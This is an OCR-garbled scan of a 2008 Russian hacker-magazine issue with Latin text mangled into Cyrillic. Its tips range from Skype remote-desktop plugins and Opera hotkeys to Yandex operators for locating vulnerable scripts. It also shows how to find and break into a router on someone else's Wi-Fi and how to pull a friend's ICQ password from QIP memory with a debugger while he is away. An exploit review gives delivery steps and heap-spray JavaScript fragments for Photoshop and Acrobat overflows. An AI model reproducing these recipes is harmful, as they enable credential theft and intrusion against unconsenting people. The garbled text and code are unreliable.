Безопасность соединения и авторизации обеспечиваются продуманными 
схемами многоуровневой защиты и шифрованием данных. Не зря эта ком- 
пания приобрела проверенный временем продукт НатасЫ (да-да, именно 
тот, о котором мы говорили ранее). Ктомуже, сервис используют более 40 
миллионов устройств по всему миру, а это уже своего рода гарант качества. 
А теперь подумай: можно ли вообще обойтись без серверной про- 
граммы? Сделать так, чтобы клиентская и серверная часть — обе 
работали через браузер? Кажется абсурдным, но компания АО обе до- 
казала, что и это реально! По адресу ѵѵѵѵѵѵ.асІоЬе.сот/асот/соппесІпоѵѵ/ 
находится их новый сервис АсІоЬе СоппесІІМоѵѵ, который в данный 
момент проходит стадию бета-тестирования. Если охарактеризо- 
вать его в двух словах, то это — конференция онлайн прямо в твоем 
браузере. Набор полный шик: аудио и видеоконференция, чат, доска 
ѵѵЬІІеЬоагсІ, на которой в реальном времени могут рисовать участни- 
ки, и, конечно же, Ретоіе Безкіор! Для доступа ко всей этой красоте 
есть единственное условие, о котором ты, наверное, догадался, 

— установленный на компьютерах АбоЬе Ріа 5 Гі Ріауег. Сам Нетоіе 
Безкіор пока еще местами подглючивает, но, уверен, разработчики 
скоро разберутся с багами! 




Установка плагина для 5 куре 



г ТЕЛЕФОННЫЙ ПОДХОД: ОСЕДЛАЕМ БКУРЕ 

Мы уж много раз писали о ѴоІР- клиенте Зкуре и его замечательном прото- 
коле, который хоть и не обламывается расходоватьтрафик пользователей 
на свои нужды, но за счет этого позволяет использовать телефонию с 
любого компьютера практически без ограничений, уверенно проходя 
через маршрутизаторы. Грех не использовать столь продвинутый прото- 
кол, поддерживающий криптостойкое шифрование данных для гетоіе 
сіезкіор’а! Задача упрощается еще и тем, что Зкуре имеет продвинутое 
АРІ, а поэтому плагины к нему появляются, каксосиски в колбасном цеху: 
чутьли не каждый день и помногу. Нет ничего удивительного втом, что мы 
нашли, как минимум, два подходящих аддона: гетоІеХ [ ѵѵѵѵѵѵ.гетоіесаи. 
сот/гетоІеХ/іпсІех.азр ) и Мікодо ( ѵѵѵѵѵѵ.тікодо.сот ). Первый рассчитан 
исключительно на гетоіе безкіор, а второй — на организацию онлайн 
собраний с поддержкой удаленного рабочего стола. Установить их проще 
простого: все плагины распространяются в виде единственного файла 
с расширением .зрагк. С установленным в системе Зкуре’ом достаточно 
дважды кликнуть по нему и согласиться на установку. Остается только 
выбрать контакт и в контекстном меню указать название нужного плагина. 
Забавно, что в русской версии вопрос перед пользователем будет постав- 
лен так: «Вас приглашаютсыграть в ПетоІеХ». Какиетам игры, серьез- 
ные вещи творим! Клиент еще раз спросит о правомерности работы этих 
плагинов, и после очередного согласия ты получишь доступ к удален ному 
рабочему столу. Надо сказать, вариант этоттребует достаточно шустрого 
канала. Если канал узкий, то непременные тормоза будут сильно напря- 
гать. 





Рабочий стол доступен несмотря на файрволы и ЫАТ’ы 



В ТВОЙ ПОДХОД! 

Атеперь, наш друг, очередьза тобой. Еслиутебя есть собственный способ 
для удаленного доступа к рабочему столу, и ты уверен, что он принципиаль- 
но отличается от всего перечисленного, пиши нам! За самый интересный 
вариантмы обещаем ценный приз!зс 
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Базу Наск} 

Уі^ШііИШЦЮгііМкІШІ Леонид «св@ ѵѵі_ев» исупов 

/ П0Ю@МАІІ..П1І / / СП АѴѴІ.ЕВН АСК@ВАМВІ_ЕК.ВІІ / / КАІГОГЫГЕ@ВК.ВІІ / 




ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 




Если ты потерял вкладку (случайно закрыл) , и не помнишь 
ссылки, то нажми СТКЬ+2 



ЗАДАЧА: 



|СЕРФИТЬѴѴЕВ ЧЕРЕЗ БРАУЗЕР ОРЕКА БЕЗ МЫШКИ 

РЕШЕНИЕ: 



Стандартный веб-серфинг с участием хвостатой зверушки (ака мышь) от- 
нимает достаточно много времени. А ведь работать с клавой можно гораз- 
до шустрее, ктому же, далеко не всегда есть возможность юзать браузер с 
мышкой. Поэтому будем тренироваться веб-серфингу при помощи клавы, 
на примере популярного браузера Орега. Чтобы полноценно овладеть 
технологией подобного драйва, следует запомнить ряд важных деталей, 
которые ниже я аккуратно расписал по порядку: 

1. Запомни и прочувствуй собственными пальцами все горячие клавиши 
браузера, такие как: 



Р2 — перейти по адресу 
РЗ — поиск на странице 
Р4 — боковая панель 
Р5 — обновить страницу 

Р11 — развернуть (свернуть) Оперу на весь экран 
Р12 — быстрые настройки (выключить 68, ебс. ) 

+ — увеличить масштаб 

уменьшить масштаб 

СТКЬ + 0 (ноль) — масштаб 100% 



СТКЬ + Т — создать вкладку 

СТКЬ + VI — закрыть вкладку 

СТКЬ + 8 — сохранить страницу 

СТКЬ + Р — печатать страничку 

СТКЬ + Б — добавить страницу в закладки 

СТКЬ + Р2 — настройки 

СТКЬ+ ТАВ — переключиться между вкладками 



8НІРТ+СТРЕЛКИ — двигаться по ссылкам 

ТАВ — навигация по элементам управления (кнопки, поля для 
ввода, ебс . ) 

2. Если под рукой есть мышь, то она может оказать тебе небольшую услугу 
при взаимодействии с клавой: 

КІОНТВ + мышь влево — назад 

КІОНТВ + мышь вправо — вперед 

КІОНТВ + мышь вниз — создать новую вкладку 

На первый взгляд может показаться, что запомнить всеэти комбинации 
нереально. Поверь моему опыту — ежедневные тренировки сделают из 
тебя настоящего ковбоя клавиатуры. 



Серфим без мыши 




№2 



ІЗАДАЧА: 



НЫХ ЗАПРОСОВ В ѴАЫРЕХ 

РЕШЕНИЕ: 

Наверняка ты знаком со специальными запросами Гугла, и они не раз выру- 
чали при поиске той или иной баги. Однако с недавнего времени Гугл стал 



завинчивать гайки и парситьс его помощью становится проблематично 
(особенно, если речь идетоб автоматизированном поиске). Поэтому многие 
устремили взгляды в сторонудругих поисковиков, втом числе и Яндекса. 
Сейчас мы рассмотрим наиболее полезные команды поисковика. Затемты 
сможешь опробовать их в деле :). 

1. $бібіе (выражение) — позволяет провести поиск в за- 
головке страницы, например, $біб1е (название бажного 
скрипта) . 
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2. #ішаде=" значение" — такой запрос позволит произвести 
поиск картинок с указанным названием, полезно при работе 
с локальными инклудами . 

3. #Ьіпб= (выражение) — команда проводит поиск в подписях 
к изображениям. 

4. #иг1 = " значение" — означает поиск на заданном ресур- 
се, аналог "іпзібе" в Гугле, например, #иг1= "ѵтѵі. багдеб . 
сот" . 

5. #1іпк=" значение" — команда позволяет задать поиск 
ссылок на заданный сайт, например, #1іпк= "ѵллпл . ЫаЫа . 
сот" . Помогает при парсинге бажных движков, имеющих в 
своем контенте линк на сайт производителя. 

6. Ьозб = "ѵтѵ7Ѵ7.1іозб . ги" — команда аналогична "игі" с име- 
нем хоста, но учитывает все зеркала сайта. 

7. гЬо8б="ги.иг1 . *" или гЬозб="ги .игі .ѵтогог" — этот опера- 
тор аналогичен бюзб, но имя хоста записывается в обратном 
порядке: вначале домен верхнего уровня, затем второго и 
т. д. Если в конце указано . * , то поиск идет по всем под- 
доменам заданного домена (но — не включая домен ги.игі! ) , 
например, гбюзб= " ги . багдеб .*" . 

8. 1апд="язык" — такая команда отбирает для поиска 
страницы, написанные на определенном языке: на русском 
(ги) , украинском (ик) , белорусском (Ье) , английском 



(еп) , французском (бг) , немецком (бе) и т.д. , например, 
1апд=" бе" . Очень удобно, когда работаешь по какой-то оп- 
ределенной стране . 

9. 1іке="иг1 .ги/біІе.ЬбтІ" — парсит страницы, похожие на 
заданный адрес. Весьма полезная команда. 

10. бошаіп=" домен" — с помощью такой записи можно произ- 
вести поиск по страницам, которые расположены в заданном 
домене: ботаіп= " багдеб " /+1 ботаіп= " сот" . 

11. бабе="ГГГГ{* |ММ{* | ДД} } " — в этом случае поиск произ- 
водится только по страницам, дата которых удовлетворяет 
заданному условию, что позволяет пропускать при парсинге 
старые , не обновляемые ресурсы . 

Как видишь, нетолько Гугл способен удовлетворятьтвои ненасытные 
потребности. 



Яндекс — надежный друг хакера :) 




№3 



1ІЩ ТГСКСІН АНЯ ЩХИКДОЛ 



ЗАДАЧА: 



] ПРОВЕРИТЬ УНИКАЛЬНОСТЬ 
ТЕКСТА АКА РЕФЕРАТ/КУРСОВАЯ 

РЕШЕНИЕ: 

Зачастую нам необходимо удостовериться 
в уникальности полученного текста, будь 
то статья, курсовая или даже дипломная 
работа. Конечно, взаимодействие с Гуг- 
лом/Яндексом никто не отменял, но искать 
ручками несколько напрягает. Намного 
продуктивнее будет воспользоваться 
специализированным сервисом от ѵѵѵѵѵѵ. 

ІехіЬгокег. ги . Для этого оттебя требуется 
совсем немного. 

1 . Заходим на ѵѵѵѵѵѵ.ІехіЬгокег.ги и сливаем 
утилу в виде клиентского приложения: 
ШрѴЛехіЬгокег.ги/таіп/сІсГпсІег.ЫтІ . 

2. Тулза не требует установки, поэтому пропи- 
сываем ей разрешение в фаере и запускаем. 

3. Жмем «Далее». Затем указываем тексто- 
вый файл, который необходимо проч екать, либо указываем у рл с 
текстом или же вбиваем текст ручками. 

4. Опять нажимаем «Далее» и ждем результатов поиска. 



С Гцр-^г ЛЪЙ Ф#*І 

Сэті гял т^іщт УУ=У 



га 



Проверяем копирайт! 



В качестве ответа прога выдаст: уникален твой текст или нет. В случае 
если текст все же имеет копии и гуляет по Сети, в доказательство тебе 
будет предоставлено до 50 линков :). 




ЗАДАЧА: 



В СОЗДАТЬ ѴѴІ N 00Ш5 Ы ѴЕ СО 

РЕШЕНИЕ: 



Глядя на большое разнообразие *піх-дистрибутивов, работающих с диска, 
порой возни кает желание получить Винду, не требующую установки. Ниже 



будет описано одно из решений, помогающих создать некое подобиеавто- 
загрузочного ѴѴІпбоѵѵз Ыѵе Сй (0Ѵ0). Потеря в функционале будет покры- 
ваться мобильностью. Тестировалось все на ѴѴІпХр 5Р2. 

1 . Ставим прогу Вагб РЕ Виіісіег [ ѵѵѵѵѵѵ. пи2.пи/реЬиіІбег ) — чем свежее, тем лучше. 
2 . Запускаем РЕ Виіісіег и кладем в сидюшникустановочный диске обыч- 
ной Виндой либо, если есть, монтируем образ на виртуальный привод. 
Показываем проге путь к инсталляционным файлам ѴѴІпбоѵѵз в первом поле 
«Источник». Будет проведена автоматическая проверка. При отсутствии 
нужных файлов утила ругается, что ей дали нето. 
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3. Создаем папку с коллекцией прог, не нуждающихся в установке, либо с их 
рогІаЫе-версиями. Указываем путь к ней в графе «Дополнительно». 

4 . Выбираем способ записи на носитель: довериться механизмам записи 
РЕ Виіісіегили создать 150-образ для дальнейшего прожига любимой 
горелкой. Экспериментироватьс подсовыванием этого образа вѴМѴѴаге не 
стоит, куда веселее работать «вживую». 

5 . Посещаем раздел «Модули» и включаем нужное. Не стесняемся об- 
ращаться к разделу «Помощь»: там есть и описание модуля, и адрес для 
закачки при его отсутствии. 

6. Наконец, щелкнув «Создание сборки», наблюдаем, какбегаютпоэкрану 
буквы отчета... 

Вот и готов наш диск. Но почему его размер -150 мегабайт? К сожалению, 
очень многоеурезано. Восстанавливатьфункционал можнотолько вруч- 
ную, постепенно подбирая нужный набор проги драйверов. Например, мы 
потеряли Ехріогег — кидаем Орега рогІаЫе, ТоІаІСоттапсІег (пун ктЗ) либо 
юзаем встроенный менеджер файлов. В нем, кстати, не забудь сменить 
шрифтна Агіаіс кириллицей, иначетебя ожидает пустое дерево файлов и 
окошко с папками. Полезность полученного диска будетзависеть именно от 
софта, который в него закинули перед сборкой. 



Ничего сложного 





ЗАДАЧА: 



ПРОСМОТР НЕДОКАЧАННОГО ВИДЕО В Р2Р-СЕТЯХ 



РЕШЕНИЕ: 



Как часто радость отзакачки долгожданного фильма заканчивается уже на 
первых минутах просмотра! Видео скачалось не до конца. 

Проблема решается довольно просто: 

1. Восстановлением недока чанного видеофайла как поврежденного при 
помощи специальныхутилит; 

2 . Просмотром закачанной части плеером, игнорирующим возникающие 
ошибки. 

Рассмотрим второй вариант применительно к популярной р2р-сети 
ОігесіСоппесІ. 

1. Открываем директорию с временными файлами клиента ОС. Какправи- 
ло, это папка Іпсотріеіе в каталоге, куда установлен сам клиент. Если такой 
нет, уточнить можно в его настройках: «Рііе Зеіііпдв Ооѵѵпіоасіз 

□ ігесіогіев -> II пбі п ізИесІ_сІоѵѵп ІоасІ5_сІ і гесіогу». 

2 . Находим нужный файл вида «<название> . <~3 9 символов ТТН> . 
сісСтр». Например, «Брат . аѵі . ХѴ7В2С45ВІЫ2202ѴХЗ ІШШСЮКОСЗКК 
І4БѴ02КІ . сЗсСшр». 



3. Копируем его, дабы не мешать ОС-клиенту работать. 

4 . Качаем и ставим бесплатный (О N ІЛ «Ѵіс тесііа ріауег» — ѵІс-0.8.61-ѵѵіп32 
либо посвежее. 

5 . Запускаем плеер, перетаскиваем выбранный файл. Читаем предупреж- 
дение отом, что файл поврежден и выбираем «Ыо» в ответ на предложение 
восстановить его (есть куда более удобные утилы для восстановления 
видеофайлов). Теперь смотрим то, что успело закачаться, и делаем выводы, 
стоит л и п родолжать сл и вать этот фильм. 

Для любителей комфорта можно 
посоветовать Сгузіаі Ріауег (Рго) 

( ѵѵѵѵѵѵ.сгѵвіа [ріауег. сот ). Некоторые 
фильмы он проигрываетболее 
стабильно, чем Ѵіс тесііа ріауег, и 
имеетболее приятный интерфейс. 

Если же все-таки захочется попро- 
бовать повозиться с восстановле- 
нием поврежденного недокачан- 
ного видео (первый способ), можно 
посоветовать прогу Рііе Заіѵаде. 

Хоть ее и продвигают как утилиту 
для копирования файлов с плохо 
читающихся СО и ОѴО, для наших 
целей она вполне подойдет. 





кМіУДІШ кАК НАЙТИ ШЛЮЗ В ЧУЖОЙ ѴѴІРІ-СЕТИ? 
РЕШЕНИЕ: 



Иногда возникает необходимость найти роутер в ѴѴі Рі-сети , особенно если 
он скрывается не натрадиционныхадресах по СЮР-нотации. Делается это 
для разных целей, втом числе для взлома админки и абордажа всей сети. 
Еслитебеуже выдало ІР-адрес,то проанализировать, где же заветный 
сервак, можно по названию производителя. Согласись, при виде СІ5С0 не 
подумаешь, что перед тобой обычный воркстейшн. При таком раскладе в 
ход идет самая известная хакерская программа Саіп&АЬеІ. Скачиваем ее, 
а затем: 

І.Жмем «зпіііег». Переходим на вкладку «Зпіііег», нажимаем на знак«+», 
жмем ОК. Такты получишь список всех объектов в сети и их производите- 
лей с опорой на МАС-адрес и базу 0111 . А вотдругой способ не опирается 



на догадки. Проект Максима Суханова под названием АпІіІЧаІ позволяет 
находить искомое на основе прослушиваниятрафика. В его комплекте есть 
специальная утилита ЫАТ5САЫ. 

2 . Пример ее использования: паСзсап 192.168.0.1 192.168.0.254 
213.180.204.8 192.168.0.15 

Первые два параметра задаютдиапазон подсети. Третий — это реальный 
адрес, к которому можно обратиться ( ѵа.ги ). ну и последний — твой айпиш- 
ник. При атаке для аудита защищенности ѴѴЕВ-составляющей роутеров 
можно использовать профессиональную утилиту Алексея «квигі» Сурикова 
(ІРАТ — Іібеіепсе.ги/Ьаисіііог/Ьаисіііог ЫТЕ.Іхі ): регі ЪаисііСог .рі -з 
192.168.0.1 -е 192.168.0.100 -г 1та_герогС . ТЩтІ 
В отчете ты получишь всю информацию о предполагаемых местах его 
нахождения и сведения об админке. Еслижетрудноститаки остались не- 
разрешенными, вспомни о вещах, связанных стем, откуда ты получал ІР, и 
поснифай себя на предметзапросов ОНСР-ОЕЕЕП (предложение ІР-адреса 
от ОНСР-сервера). Сделать это можно известными средствами ѴѴІгевЬагк, 
Соттѵіеѵѵ или Ісрбитр. 
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№7 

МАКСИМАЛЬНО БЫСТРО ИЗМЕНИТЬ АТРИБУТЫ КАКОЙ- 
ЛИБО СЕКЦИИ, КОГДА ПОД РУКОЙ ТОЛЬКО РЕДАКТОР НІЕѴѴ 

РЕШЕНИЕ: 

Естественно, встречаются ситуации, когда мы не располагаем средствами, 
которые позволяют наглядно редактировать различные атрибуты, располагаю- 
щиеся в заголовке РЕ-файла. Обычно для подобных целей используются тулзы 
вроде богсІРЕ, но что делать, если в нашем арсеналетолько НІЕѴѴ? Несмотря на 
маленький «вес», этот шестнадцатеричный редактортаит в себе огромные воз- 
можности. Итак, посмотрим, как поменять атрибуты секции, используя НІЕѴѴ. 

1. Открываем необходимый РЕ-файл при помощи Ніеѵѵ. 

2. Нажимаем <Е4> для выбора режима редактирования файла. 

3. В появившемся окне выбираем «Оесосіе» для отображения в режиме 
дизассемблера. 

4. Нажимаем кнопку <Е8> (пункт меню «Неабег») для перехода в режим 
отображения заголовков секций. 

5. Жмем <Е6>, чтобы выбрать редактируемую секцию. В появившемся 
меню, как правило, представлено несколько секций с типичны ми названи- 
ями: « . бехб», «.баба», « . гзгс» и такдалее. Чаще всего исследователя 
интересует« . бехб» — секция кода. Выбираем необходимую секцию. 

6. Послетого, каксекция выбрана, нажимаем <ЕЗ> (пункт меню «Есііі:») для 
редактирования ее атрибутов. 

7. Появится окно, содержащее различные параметры редактируемой сек- 
ции. Нас интересует последняя строка, а именно — «АигіЬіЛез», которая 
содержит четырехбайтную флаговую переменную с атрибутами секции. 
Выделяем строку «АигіЬігіез» и нажимаем <ЕЗ>. 

8. Появится окно, содержащее четыре байта флаговой переменной в 
двоичном виде. Чтобы разрешить запись в секцию, необходимо соответст- 
вующий бит (в данном случае — старший) перевести в значение «1 ». Точно 
также необходимо действовать и при изменении других атрибутов секции. 



9.Трижды нажимаем <Е9> (пункт меню «ІІрбаіе») для подтверждения 
изменений. 

Дабы получитьтребуемую комбинацию параметров, совсем не обязательно 
помнить, какой бит«взводят» в единичное значение или сбрасывают в нулевое. 
Нужнолишь сложить шестнадцатеричные значения, соответствующие конкрет- 
ным атрибутам, и получить готовую четырехбайтную флаговую переменную. 



0x00000020 

0x00000040 

0x00000080 

0x01000000 

0x02000000 

0x04000000 

0x08000000 

0x10000000 

0x20000000 

0x40000000 

0x80000000 



— секция содержит код 

— секция содержит инициализированные данные I 

— секция содержит неинициализированные данные 

— секция содержит расширенные поправки 

— секция может быть игнорирована 

— секция не кешируема 

— секция не сбрасывается в страничный файл 

— общая секция 

— секция выполняемая 

— секция для чтения 

— секция для записи 





ЗАДАЧА: 



| ВЫУДИТЬ ПАРОЛЬ ИЗ РАБОТАЮЩЕГО КЛИЕНТА ОІР 
ВЕРСИИ 8070, ИМЕЯ В АРСЕНАЛЕ ОТЛАДЧИК ОЬЬУРВО 
РЕШЕНИЕ: 



Представьте ситуацию: приятель отошел покурить, а мы оченьхотим узнать 
парольегоаськи :). Сделать это проще, чем кажется. Необходимо лишь 
действовать методом строго научноготыка. Исследовав ОІР версии 8070, 
я обнаружил, что пароль всегда хранится в памяти в открытом виде. Это 
очень опасно и может позволитьлюбому продвинутомутрояну «утащить» 
твою аську. Чтобы найти алгоритм поиска пароля, я действовал так: запус- 
кал ОІР, входил под конкретным аккаунтом, затем искал в памяти пароль 
(свой пароль, естественно, мне известен). При этом была выявлена очень 
интересная деталь: пароль всегда находился в одной и той же секции 
памяти, но по разным адресам (00Е2 0000- 00Р1РРРР). Хотя промежуток и 
небольшой, поддающийся ручному просмотру, необходимо было выделить 
еще один признак, по которому можно было бы безошибочно искать пароль 
в памяти загруженного ІСО-клиента. Присмотревшись внимательнее, я 
заметил, что перед паролем в памяти находится сигнатура, всегда одина- 
ковая, которая выглядит так: 

ІА 00 00 00 02 00 00 00 XX 00 00 00, 

гдеХХ — длина пароля. Например, для пятизначного пароля сигнатура 
будет вы глядеть та к: 

ІА 00 00 00 02 00 00 00 05 00 00 00 

Нас не волнует, для чего она используется. Главное, мы выявили признак, 
который явно указывает на местоположение пароля в памяти клиента. 
Решение задачи будет вы гл я деть так: 



1. Запускаем отладчики приаттачиваемся к работающему процессу цір.ехе; 

2. Открываем карту памяти процесса (<аИ+т>); 

3. Выбираем двойным щелчком область памяти, начинающуюся поадресу 
00Е20000; 

4. Комбинацией клавиш <сМ-Ь> открываем окно поиска; 

5. Вставляем в нижнее поле появившегося окошка поиска двоичный код- 
сигнатуру(1А 00 00 00 02 00 00 00 XX 00 00 00) и нажимаем «Ок»; 

6. Текст, следующий сразу после найденной сигнатуры, является паролем. 
Р.З. Не удивлюсь, если узнаю, что после выхода этого выпуска ЕА5УНАСК 
появится новый релиз ОІР. тг 
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^ I ОБЗОР ЭКСПЛОЙТОВ 



КРИС КАСПЕРСКИ 



СЕРЕДИНА ЛЕТА 2008. ЖАРА. ВСЕХ ПЛЮЩИТ, ВСЕ ГЛЮЧИТ. АБОВЕ РАДУЕТ НАС ШИРОКИМ АССОР- 
ТИМЕНТОМ ДЫР. М5 ВЫПУСКАЕТ ЧЕТЫРЕ ПАТЧА, ОДИН ИЗ КОТОРЫХ — ВРЕДОНОСНЫЙ. ЗАТЫКАЯ 
МНИМУЮ ДЫРУ, ОН ЗАТЫКАЕТ ЕЕ НЕ ДО КОНЦА, ЗАТО ВЫЗЫВАЕТ ТОРМОЗА И КУЧУ КОНФЛИКТОВ 
СО СВОИМИ ЖЕ СОБСТВЕННЫМИ ПРИЛОЖЕНИЯМИ. НО — ОБО ВСЕМ ПО ПОРЯДКУ! 



АйОВЕ 
РН0Т05Н0Р 

СТЕКОВОЕ ПЕ- 
РЕПОЛНЕНИЕ В ВМР- 
ПАРСЕРЕ 



» Вгіе* 



21-гоапреля 2008 года, ровно в 
12:23:21 по БританскомуЛетнему 
времени (В5Т), хакер, известный 
под ником сОпІех ( сОпІехЫсІатаіІ. 
сот і. забросил на Еиіі-сіізсіозиге 



свежий ехріоіі, вызывающий стеко- 
вое переполнение в парсере ВМР- 
файлов и пробивающий АР5В07- 13 
раІсЬ, который затыкал в парсере 
многочисленные дыры. Еще одно 
подтверждение, что баги ходят 
косяками и не затыкаются с первой 
попытки! Выпуск патча отнюдь 
нетрагедия для хакеров, скорее 
— повод для более глубоких иссле- 
дований. Вот и сейчас: стековое 
переполнение позволяет подменять 



адрес возврата и захватывать конт- 
роль над системами ѴѴ2К, ХР, 52КЗ, 
52К8 старыми добрыми «дедовски- 
ми» методами. ХР5Р2+сактивным 
аппаратным й ЕР, задействованным 
для всех приложений, ломается 
через атакутипа ге!игп21ІЬ. Висту 
с ее рандомизацией адресного 
пространства подломать сложнее, 
но все-таки возможно, поскольку 
продукты АЬобе, выпущенные до 
выхода Висты, ничего о рандоми- 
зации не знают (типа, не в курсе) 
и грузятся по фиксированным 
адресам. Хоть и варьирующимся от 
версии к версии, но все-таки — до- 
статочно предсказуемым. Прочие 
подробности можно почерпнуть 
тут: ІізІз.агок.ога.ик/рірегтаіІ/ІиЦ- 
бІ5СІО5иге/2008-Аргі 1/061 661 .Ыті и 
5есигі1ѵ1осиз.сот/ЬісІ/28874/іп1о . 



»ТагдеІ5| 



Позаявлениям АбоЬе, совпадаю- 
щим с выводами сОпІех’а, дыра за- 
трагивает РЬоІозЬор АІЬитЗіагІег 
Есііііоп 3.2 и АКег ЕіТесІз С53 0, а 
также непропатченные РЬоІозЬор 
С52/С53 и РЬоІозЬор Еіетепіз 5.0. 
Туже самую графическую библио- 
теку используют АсгоЬаІ Реасіег и 
АсІоЬе РІазЬ Ріауег, однако, уязви- 



мость на них не распространяется. 



» Ехріот 



Втр-файл, начиненный зЬеІІ-ко- 
дом, содержится в посте сОпІех’а, 
пожеванным ІІІІЕ-конвертором. 
Обычно начинающие хакеры 
спрашивают: «А какего конверти- 
ровать взад?!» Нет ничего проще! 
Выделяем текст, копируем его 
через буфер обмена в блокнот и по 
ходу дела переименовываем .1x1 в 
.еті После чего открываем .еппі, 
вызывая ассоциированный с ним 
Оиііоок Ехргевв. Он автоматически 
декодирует 1111 Е, отображая его в 
виде вложения, сохраняемого на 
дискобычным способом. Оста- 
ется передать Ьтр атакуемому и 
заставить его открыть файл именно 
в РЬоІозНор’е. Для этого приходится 
задействовать социальную инже- 
нерию или другиетрюки (тема для 
отдельного разговора). Те, комулень 
возиться с ІІІІЕ, могутскачать гото- 
вый Ьтр: з есигііѵіосиз.сот/сіаіа/ 
ѵиІпегаЬІІІІІез/ехрІоіІз/АсІоЬе А5 
ЕхрІоіІ.Ьтр . Сплойт несет на борту 
зНеІІ-код, выдернутый из Меіазріоіі 
ргоіесі и работающий строго подХР 
5Р2 ЕЫО, где он запускает кальку- 
лятор. На всех остальных системах 




Декодируем ІІІІЕ при помощи М5 Оиііоок ЕхргезБ 
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» 




Атака на функцию СоІІаЬ. соІІесіЕтаіИпЫ) 



ѵгЬіІе (Ыоск . ІепдкЪ. + 
20 + зкеіісосіе . ІепдкЬ < 
0x40000) 

Ыоск = Ыоск + Ыоск 
+ ЫІІЫоск; 
агг = пеѵг Аггау ( ) ; 
бог (і=0 ; і<2 00 ; і++ ) 
агг [ і ] = Ыоск + 
зкеіісосіе; 



} 

кеарзргау (ипезсаре ( 

" %исссс%исссс" ) ) ; 

СоІІаЬ . соІІесбЕтаіІІпбо 



(и, в частности, на моей ХР5Р2 МІІІ] 
— просто выбрасывает сообщение 
о критической ошибке, посколь- 
ку использует жестко прошитые 
(Ьагб-сосІесІ) адреса АРІ -функций, 
привязанные к конкретной версии 
оси. Для ргоококсопсері вполне 
сгодится, а вот для реальных атак 
зЬеІІ-код приходится переписывать 
заново. Прямо в НІЕѴѴ’е. Там он 
начинается со смещения 1196. 



»5оІи1іоп 



Установить заплатку от АЬосіе 

( асІоЬе.сот/зиррогі/зесигііѵ/ 
ас!ѵІ5огіе5/ар5а08-04.Ы:т[ 1 и л и же 
не открывать РЬо^озЬор’ом никакие 
Ьтр-файлы, полученные из нена- 
дежных источников. 



АйОВЕ 
АС ВО ВАТ/ 
V А ВЕАРЕВ 

ПЕРЕПОЛНЕНИЕКУЧИ 

ВМѴА5СВІРТ 



>> Вгіе{ 



В начале февраля этого года 
консультант по информационным 
технологиям Пол Крэг/Раиі Сгаід 
[ Іі п кесі іп.сот/ри Ь/4/79Ь/4ЬЬ І 
обнаружил дыру в « . з оЬоркіопз» 
(АсгоЬа* боб Орбопз Рііе). 

Он не преминул уведомить об 
этом АбоЬе, которая в ходе аудита 
кода выявила множественные 
ошибки переполнения кучи в 
баѵаЭсгірі-движке. И уже в июле 
(и трех лет не прошло) выпустила 
«лекарство» в виде заплатки, 
дизассемблировав которую хакеры 
смогли сконструировать боевые 
ехріоіі’ы. Те использовали дефект 
реализации функции СоІІаЬ. 
соІІесбЕтаіІіпбо ( ) , копирующей 
таіі-адрес в блокдинамической 
памяти фиксированного размера 
без проверки длины копируемых 
данных. Все это ведет к переполне- 
нию кучи с возможностью захвата 



управления в контексте привилегий 
запущенного приложения. Джейсон 
Ройс/базоп Роуез — ведущий архи- 
тектор (СИ іеб АгсЬііесі) из Епбеаѵог 
Эесигііу Іпс (приютившей меня как 
блоггера и реверсера) детально 
исследовал проблему, опубликовав 
полученные результаты на своем 
блоге та[юоизаНаскег.Ы.оазрок 
сот/2008/07/арзЬ08-1 5-рагЫ .Ніті . 
Также рекомендуется к прочтению 
зесипМосиз.сопп/ЬісІ/27641/іпк) . 



»ТагдеІз: 



Списокуязвимых версий весьма 
внушителен. Это создает все пред- 
посылки для очередной глобальной 
эпидемии, поскольку рек- документы 
давно стал и ста н да рто м де-фа кто , 
и большинство из нас используют 
довольно древние версии АсгоЬаІ 
Пеабег’а, прилагаемого к целому 
спектру оборудования. Обновлять 
АсгоЬаі Реабег никому не приходит в 
голову, даже если он сам настойчиво 
это предлагает. Поданным АбоЬе, 
уязвимость затрагивает: Реабег7.0.9 и 
более ранние версии, атакже все вер- 
сии между РеасІег/РгоІюззіопаІ/ЗО 8.0 
и Реабег8.1 .2 включительно. Версии 
7.1.0 — 7.1.0 не подверженыуязвимос- 
ти, также, каки версии 9.x, выход 
которой запланирован на июль2008. 
Аналогичные ошибки переполнения 
были обнаружены в независимых 
РОЕ-утилитах, и, в частности, доволь- 
но популярном Еохіі Реабег’е. 



» ЕхрІоіі| 



Ниже приведен исходный текст 
ехріоіі’а, «впрыскивающего» про- 
извольный збеіі-код в переполнен- 
ную кучу, выдранный из презента- 
ции Пабло Сола/РаЫо 5о1е (зепіог 
зесигку гезеагсЬег из Іттипііу 
Іпс.). Іттипку Іпс имеет готовые 
рск-документы уже «начиненные» 
збеіі-кодом, но распространяет их 
по подписке, за деньги (причем, 



нехилые) и только юридическим ли- 
цам. Что ж, не хотят с нами делиться 
награбленным и не надо! Восполь- 
зуемся продвинутым РОЕ-редак- 
тором РОРРІИ ( рбби.сот/боѵѵпіоаб. 
Ніт П и внедрим баѵаЭсгірі в РОЕ 
самостоятельно! Полный текст пре- 
зентации лежит на гесоп.сх/2008/ 
зреакег5.Ьіт[#іттипііѵсіеЬиаег . 

Сорцы сплоита, внедряющий 
зИеІІ-код в переполненную 
кучу и передающего на него 
управление 

бипсбіоп гереаб 
(соипб ,ѵткак) 

{ 

ѵаг ѵ = " " ; 
ѵтМІе (--соипб >= 0) 
ѵ += ѵткаб; 
гебигп ѵ; 

} 

бипсбіоп кеарзргау 
( зЬеІІсосІе) 

{ 

Ыоск= ' ' ; 
біІІЫоск = 

ипезсаре ( " %и9090 " ) ; 



( { ААА...ААА : гереаб(4096, 
ипезсаре ( " %и0909%и0909 " 

) ) ) 1 ? 

В АбоЬеАсгоЬа1;/Реабег8. 12 бескон- 
трольное копирование содержимого 
полей было пофиксено (и старые 
ехріоіі’ы перестали работать), но вот 
названия самих полей по-прежнему 
копируются в промежуточный буфер 
без контроля длины. Поэтому слишком 
длинное имя (порядка 4 Кб) вызы- 
вает переполнение с возможностью 
передачи управления на зЬеІІ-код. 
Заплатка АР5В08-1 5 решаетэту про- 
блему путем отказа от копирования 
названий полей, используя указатели, 
переданные по ссылке. 



»5оІи1іоп 



Установить обновленную версию 
от производителя, доступную для 
бесплатного скачивания на абобе. 
сот/виррогі/зесигіІѵ/Ьииебпв/ 
арвЬ08-1 б.ЫтІ . 

РРМРЕБ 
ПЕРЕПОЛНЕ- 
НИЕКУЧИ 
